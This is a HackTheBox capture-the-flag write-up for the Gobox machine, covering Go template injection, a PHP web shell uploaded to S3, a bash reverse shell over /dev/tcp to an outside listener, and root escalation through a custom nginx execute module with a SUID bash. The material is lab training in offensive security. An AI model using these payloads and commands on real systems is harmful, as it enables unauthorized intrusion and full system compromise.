HackTheBox Gobox Writeup
Explore the fundamentals of cybersecurity in the Gobox Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.113 gobox.htb
Script to add hosts automatically
ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV gobox.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Identify the Vulnerability
- The target site at
http://gobox.htb:8080/is running a Go-based application, as indicated by theX-Forwarded-Server: golangheader in BurpSuite responses. - Based on the response, you’ve found that the application could be vulnerable to Server-Side Template Injection (SSTI) using Go templates.
Initial SSTI Test
- On the
/forgotpage, insert the payload{{ . }}in the email field to test for template injection. - If vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.
Exploiting DebugCmd
- After successfully logging in with credentials sent via email from the
/forgotpage, the source code of the application is revealed. - You discover the
DebugCmdfunction in the template engine, which allows the execution of system commands.
Test system commands using the following payloads:
{{ .DebugCmd "id" }} // Check for user privileges
{{ .DebugCmd "env" }} // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }} // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }} // List contents of a specific bucket
Preparing the Payload
- The goal is to upload a PHP reverse shell to the S3 bucket via the AWS CLI exposed through
DebugCmd. - First, generate a base64-encoded PHP reverse shell:
echo '<?php system($_GET['cmd']); ?>' | base64
This will output the encoded payload:
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
- Use
DebugCmdto decode and save this as a PHP file on the target system, and then upload it to the S3 bucket.
{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}
Accessing the Payload
- Once the reverse shell script is uploaded, it can be accessed via:
You can then execute commands by passing the cmd parameter.
Triggering the Reverse Shell
To establish a reverse shell, use the following bash command:
bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'
Since this needs to be URL-encoded, use sed to encode only the & and / characters:
echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'
Setting Up a Listener
On your local machine, set up a listener to catch the reverse shell:
nc -lvnp 9001
Triggering the Shell
To trigger the reverse shell, visit:
http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Nginx Module Exploitation (ngx_http_execute_module)
Initial Enumeration
Retrieve the user flag from /home/ubuntu/user.txt:
cat /home/ubuntu/user.txt
Investigate Nginx configuration:
ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default
You find the custom directive command on;, which is not part of the default Nginx setup, indicating a custom module.
Identifying the Custom Module
A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.
Verifying the Nginx Module
- To confirm the presence of this module and its functionality, you inspect the Nginx module binary for references to the
runfunction:
strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run
Command Execution
Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command:
curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"
curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p